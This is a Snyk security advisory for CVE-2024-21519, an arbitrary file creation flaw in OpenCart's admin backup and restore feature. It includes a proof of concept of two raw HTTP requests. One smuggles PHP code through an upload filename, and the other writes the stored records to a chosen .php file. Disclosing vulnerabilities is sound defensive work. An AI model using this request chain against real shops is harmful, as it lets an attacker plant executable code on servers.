<p>There is no fixed version for <code>opencart/opencart</code>.</p>

=4.0.0.0

Threat Intelligence

Proof of concept

0.05% (19^th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk ID SNYK-PHP-OPENCARTOPENCART-7266579
published 21 Jun 2024
disclosed 17 Jun 2024
credit Calum Hutton

Report a new vulnerability Found a mistake?

Introduced: 17 Jun 2024

CVE-2024-21519 Open this link in a new tab CWE-20 Open this link in a new tab First added by Snyk

How to fix?

There is no fixed version for opencart/opencart.

Overview

opencart/opencart is a shopping cart system

Affected versions of this package are vulnerable to Arbitrary File Creation. An Arbitrary File Creation issue was identified via the database restoration functionality. By injecting PHP code into the database, an attacker with admin privileges can create a backup file with an arbitrary filename (including the extension), within /system/storage/backup.

Note:

It is less likely for the created file to be available within the web root, as part of the security recommendations for the application suggest moving the storage path outside of the web root.

PoC

All user input ($_GET, $_POST etc) is passed through htmlspecialchars at startup, so by default will be stored in the database encoded. There are some places where this isn't the case though, such as with the filename parameter of the admin tool/upload.upload route:

POST http://127.0.0.1/opencart/admin/index.php?route=tool/upload.upload&user_token=cd4d0433339a18c414c67e090c96a9f2 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: multipart/form-data; boundary=---------------------------77933938835128784303963783419
Content-Length: 245
Origin: http://127.0.0.1
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
Cookie: OCSESSID=4ae25f8f71432cba08ae148b63; currency=USD; authorize=7d90c76197634c3ac515bdf5fc3c6c7b

-----------------------------77933938835128784303963783419
Content-Disposition: form-data; name="file"; filename="my_<?php phpinfo() ?>file.png"
Content-Type: image/png
XXX
-----------------------------77933938835128784303963783419--

html_entity_decode is used to decode the input and allows for bypass of the htmlspecialchars. This filename data is stored within the oc_upload database table.

By restoring the table and supplying the filename parameter it is possible to write the records to an arbitrary file i.e. my_script.php:

POST http://127.0.0.1/opencart/admin/index.php?route=tool/backup.backup&user_token=cd4d0433339a18c414c67e090c96a9f2&table=oc_upload&filename=my_script.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 22
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/opencart/admin/index.php?route=tool/backup&user_token=cd4d0433339a18c414c67e090c96a9f2
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Cookie: OCSESSID=4ae25f8f71432cba08ae148b63; currency=USD; authorize=7d90c76197634c3ac515bdf5fc3c6c7b

backup%5B%5D=oc_upload

References

Vulnerable Code

CVSS Scores

version 4.0

version 3.1

Attack Vector (AV)

Network
Attack Complexity (AC)

Low
Attack Requirements (AT)

Present
Privileges Required (PR)

High
User Interaction (UI)

None

Confidentiality (VC)

High
Integrity (VI)

High
Availability (VA)

High

Confidentiality (SC)

None
Integrity (SI)

None
Availability (SA)

None